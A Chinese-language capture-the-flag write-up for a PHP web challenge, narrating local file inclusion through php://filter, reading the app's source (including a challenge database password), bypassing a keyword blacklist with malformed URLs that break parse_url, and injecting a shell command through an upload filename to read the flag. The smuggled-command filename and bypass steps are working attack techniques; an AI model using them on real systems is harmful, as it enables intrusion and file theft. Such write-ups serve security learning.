打开题目发现是个登录界面,sqlmap梭一下,失败@_@。试下弱口令,也失败。那么来扫一下目录
发现register.php页面,我们随便注册个账号然后登上去,发现是一个什么美食相关的cms,扫一眼url
http://793382b9-bb75-4ce7-8dd6-cfdedaaff1d7.node5.buuoj.cn:81/user.php?page=guest
对PHP_chain有过了解的师傅看到这里应该可以一眼看出大概率存在伪协议漏洞,我们试一下php_filter_chain_generator能否一把梭:
nb,直接出phpinfo页面了,看了下disabled_functions没有system什么的,构造了一下'<?php system("echo '2' "); ?>'发现可以在开头正常回显。
本来以为到这能直接cat /flag结束战斗,结果cat /flag的返回结果是乱码@_@
É
PÃàÐÐø
不知道这是个什么玩意编码过的,玩不来misc和crypto @_@
那只好找其他路子了,既然确定伪协议可以利用,我们试下读取源码
http://549c69b5-ed26-4343-b5c5-19b3e3a71099.node5.buuoj.cn:81//user.php?page=php://filter/convert.base64-encode/resource=user
发现能读取到user.php,里面出现了function.php,我们先把所有能知道的源码都读出来
user.php
<?php
require_once("function.php");
if( !isset( $_SESSION['user'] )){
Header("Location: index.php");
}
if($_SESSION['isadmin'] === '1'){
$oper_you_can_do = $OPERATE_admin;
}else{
$oper_you_can_do = $OPERATE;
}
//die($_SESSION['isadmin']);
if($_SESSION['isadmin'] === '1'){
if(!isset($_GET['page']) || $_GET['page'] === ''){
$page = 'info';
}else {
$page = $_GET['page'];
}
}
else{
if(!isset($_GET['page'])|| $_GET['page'] === ''){
$page = 'guest';
}else {
$page = $_GET['page'];
if($page === 'info')
{
// echo("<script>alert('no premission to visit info, only admin can, you are guest')</script>");
Header("Location: user.php?page=guest");
}
}
}
filter_directory();
//if(!in_array($page,$oper_you_can_do)){
// $page = 'info';
//}
include "$page.php";
?>
function.php
<?php
session_start();
require_once "config.php";
function Hacker()
{
Header("Location: hacker.php");
die();
}
function filter_directory()
{
$keywords = ["flag","manage","ffffllllaaaaggg"];
$uri = parse_url($_SERVER["REQUEST_URI"]);
parse_str($uri['query'], $query);
// var_dump($query);
// die();
foreach($keywords as $token)
{
foreach($query as $k => $v)
{
if (stristr($k, $token))
hacker();
if (stristr($v, $token))
hacker();
}
}
}
function filter_directory_guest()
{
$keywords = ["flag","manage","ffffllllaaaaggg","info"];
$uri = parse_url($_SERVER["REQUEST_URI"]);
parse_str($uri['query'], $query);
// var_dump($query);
// die();
foreach($keywords as $token)
{
foreach($query as $k => $v)
{
if (stristr($k, $token))
hacker();
if (stristr($v, $token))
hacker();
}
}
}
function Filter($string)
{
global $mysqli;
$blacklist = "information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password";
$whitelist = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'(),_*`-@=+><";
for ($i = 0; $i < strlen($string); $i++) {
if (strpos("$whitelist", $string[$i]) === false) {
Hacker();
}
}
if (preg_match("/$blacklist/is", $string)) {
Hacker();
}
if (is_string($string)) {
return $mysqli->real_escape_string($string);
} else {
return "";
}
}
function sql_query($sql_query)
{
global $mysqli;
$res = $mysqli->query($sql_query);
return $res;
}
function login($user, $pass)
{
$user = Filter($user);
$pass = md5($pass);
$sql = "select * from `albert_users` where `username_which_you_do_not_know`= '$user' and `password_which_you_do_not_know_too` = '$pass'";
echo $sql;
$res = sql_query($sql);
// var_dump($res);
// die();
if ($res->num_rows) {
$data = $res->fetch_array();
$_SESSION['user'] = $data[username_which_you_do_not_know];
$_SESSION['login'] = 1;
$_SESSION['isadmin'] = $data[isadmin_which_you_do_not_know_too_too];
return true;
} else {
return false;
}
return;
}
function updateadmin($level,$user)
{
$sql = "update `albert_users` set `isadmin_which_you_do_not_know_too_too` = '$level' where `username_which_you_do_not_know`='$user' ";
echo $sql;
$res = sql_query($sql);
// var_dump($res);
// die();
// die($res);
if ($res == 1) {
return true;
} else {
return false;
}
return;
}
function register($user, $pass)
{
global $mysqli;
$user = Filter($user);
$pass = md5($pass);
$sql = "insert into `albert_users`(`username_which_you_do_not_know`,`password_which_you_do_not_know_too`,`isadmin_which_you_do_not_know_too_too`) VALUES ('$user','$pass','0')";
$res = sql_query($sql);
return $mysqli->insert_id;
}
function logout()
{
session_destroy();
Header("Location: index.php");
}
?>
config.php
<?php
error_reporting(E_ERROR | E_WARNING | E_PARSE);
define(BASEDIR, "/var/www/html/");
define(FLAG_SIG, 1);
$OPERATE = array('userinfo','upload','search');
$OPERATE_admin = array('userinfo','upload','search','manage');
$DBHOST = "localhost";
$DBUSER = "root";
$DBPASS = "Nu1LCTF2018!@#qwe";
//$DBPASS = "";
$DBNAME = "N1CTF";
$mysqli = @new mysqli($DBHOST, $DBUSER, $DBPASS, $DBNAME);
if(mysqli_connect_errno()){
echo "no sql connection".mysqli_connect_error();
$mysqli=null;
die();
}
?>
细看一下function.php,发现里面有三个黑名单:flag、manage、ffffllllaaaaggg,我们尝试读取下,发现直接返回hacker界面,再去审查下源码,发现filter_directory_guest函数中使用了parse_url进行URL的拆分,然后使用parse_str将query部分解析为一个关联数组,随后进行黑名单检测。
我们先来了解下parse_url函数:
parse_url 函数在 PHP 中用于解析 URL 并返回一个关联数组,该数组包含 URL 的各个组成部分。具体来说,parse_url 可以解析的 URL 组成部分有:
- scheme:协议部分,比如 http、https 等。
- host:主机名部分,比如 www.example.com。
- port:端口号部分,如果有明确指定的话。
- user:用户信息,如果 URL 中有的话。
- pass:密码信息,如果 URL 中有的话。
- path:路径部分,比如 /path/to/file。
- query:查询字符串部分,? 后的部分。
- fragment:片段标识符,# 后的部分。
对于"http://username:password@www.example.com:8080/path/to/file.php?foo=bar&baz=qux#section2"这样一个URL,parse_url的解析结果如下:
Array
(
[scheme] => http
[host] => www.example.com
[port] => 8080
[user] => username
[pass] => password
[path] => /path/to/file.php
[query] => foo=bar&baz=qux
[fragment] => section2
)
那么我们如何才能绕过黑名单检测?
有个很简单的办法:“对于严重不合格的 URL,parse_url() 可能会返回 FALSE”,下面构造一个严重不合格的URL
http://127.0.0.1//test.php
parse_url函数会将127.0.0.1和test.php同时解析为host,导致出错,直接返回FALSE,自然也就无法给关联数组赋值,从而绕过黑名单检测。
这里两个斜杠//是针对低版本PHP的绕过方法,高版本PHP我们使用///三个斜杠即可。
好了,现在我们知道如何绕过黑名单检测,来使用伪协议读取下flag、manage、ffffllllaaaaggg页面
其中flag和manage页面都无法正常读取,只有ffffllllaaaaggg页面可以
ffffllllaaaaggg
<?php
if (FLAG_SIG != 1){
die("you can not visit it directly");
}else {
echo "you can find sth in m4aaannngggeee";
}
?>
又发现了m4aaannngggeee页面,读取下
m4aaannngggeee
<?php
if (FLAG_SIG != 1){
die("you can not visit it directly");
}
include "templates/upload.html";
?>
访问下templates/upload.html,发现是一个上传页面,随便上传个图片试下,发现报错
又出现了一个upllloadddd.php(出题人真喜欢套娃@_@)
伪协议读取下
upllloadddd
<?php
$allowtype = array("gif","png","jpg");
$size = 10000000;
$path = "./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/";
$filename = $_FILES['file']['name'];
if(is_uploaded_file($_FILES['file']['tmp_name'])){
if(!move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename)){
die("error:can not move");
}
}else{
die("error:not an upload file!");
}
$newfile = $path.$filename;
echo "file upload success<br />";
echo $filename;
$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");
echo "<img src='data:image/png;base64,".$picdata."'></img>";
if($_FILES['file']['error']>0){
unlink($newfile);
die("Upload file error: ");
}
$ext = array_pop(explode(".",$_FILES['file']['name']));
if(!in_array($ext,$allowtype)){
unlink($newfile);
}
?>
审计下代码,很明显的RCE漏洞
$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");
这里直接将我们的文件名拼接进system函数,没有进行任何过滤。但问题在于这个上传页面无法正常运行@_@
实在推不动了,上网看下wp,发现真正的上传页面竟然是m4aaannngggeee(what can i say? 无语了)
访问下m4aaannngggeee,随便传个文件,抓包改filename重放
但尝试ls /失败,试了下cat config.php可以正常回显,看来是/被过滤,没关系,我们一层层跳转目录
根目录下发现flag_233333,构造filename=";cd ..;cd ..;cd ..;cd ..;cat flag_233333;#",成功拿到flag
(这逆天题目麻烦死了,写wp写得头昏脑胀@_@)
Comments | NOTHING